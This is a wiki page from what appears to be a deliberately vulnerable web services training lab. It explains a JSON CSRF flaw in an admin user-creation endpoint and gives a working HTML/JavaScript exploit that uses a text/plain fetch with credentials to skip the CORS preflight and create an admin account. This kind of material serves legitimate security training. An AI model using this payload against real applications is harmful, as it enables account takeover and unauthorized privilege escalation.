-
Notifications
You must be signed in to change notification settings - Fork 214
JSON CSRF
Sam Sanoop edited this page Jan 13, 2026
·
1 revision
This guide demonstrates how to exploit the JSON CSRF vulnerability in the "Create User" admin feature.
The endpoint /api/v2/admin/create-user allows creating new users. It is intended to accept JSON. However, it is misconfigured to:
- Accept
Content-Type: text/plain. - Parse the request body as JSON even if the Content-Type is text.
- Authenticate using Cookies (which are automatically sent by browsers).
This combination allows an attacker to perform a Cross-Site Request Forgery (CSRF) attack using a mechanism (like fetch or a form) that bypasses the CORS preflight check, which usually protects JSON endpoints.
An attacker wants to create a new Administrator account on the target system without knowing the current admin's credentials. They trick a logged-in admin into visiting a malicious webpage.
Host the following HTML file on a malicious server (or locally as exploit.html).
<!DOCTYPE html>
<html>
<body>
<h1>CSRF Exploit: Creating Admin User</h1>
<script>
// Target endpoint
const url = 'http://dvws.local/api/v2/admin/create-user';
// Malicious Payload (New Admin User)
const payload = JSON.stringify({
username: "hacker_admin",
password: "password123",
admin: true
});
// Execute CSRF
// Using 'text/plain' prevents a CORS preflight (OPTIONS) request.
// 'credentials: include' ensures the victim's session cookies are sent.
fetch(url, {
method: 'POST',
mode: 'no-cors', // Opaque response (we don't need to read it)
headers: {
'Content-Type': 'text/plain'
},
body: payload,
credentials: 'include'
}).then(() => {
document.body.innerHTML += "<p>Exploit sent!</p>";
}).catch(e => {
document.body.innerHTML += "<p>Error: " + e + "</p>";
});
</script>
</body>
</html>-
Log in to the DVWS application as an Admin (e.g.,
admintest/admintest). - Open the
exploit.htmlfile in a separate browser tab (simulating visiting a malicious link). - The script will execute automatically in the background.
-
Verify: Go back to the DVWS application (or log out). Try logging in with the credentials:
-
Username:
hacker_admin -
Password:
password123
-
Username:
- If successful, you will be logged in, and checking the Profile area will show Role: Admin.
- XML External Entity Injection
- Server Side Request Forgery (SSRF)
- Username Enumeration
- NoSQL Injection
- Insecure Direct Object Reference
- Mass Assignment
- Cross Site Scripting (XSS)
- Hidden API Functionality Exposure
- SQL Injection
- Information Disclosure
- Insecure PostMessage Configuration
- Command Injection
- Prototype Pollution
- JSON Hijacking
- XPath Injection
- Cross Origin Resource-Sharing Misonfiguration
- JWT Secret Key Brute Force
- Vertical Access Control
- Horizontal Access Control
- Open Redirect
- Path Traversal
- Unsafe Deserialization
- Sensitive Data Exposure
- Arbitrary File Write
- Introspection Enabled
- GraphQL Access Control Issues
- GraphQL Batching Brute Force
- API Endpoint Brute Forcing
- CRLF Injection
- XML Injection
- XML Bomb Denial‐of‐Service
- SOAP Injection
- JSON CSRF
- LDAP Injection
- Rate Limit Bypass
- Client Side Template Injection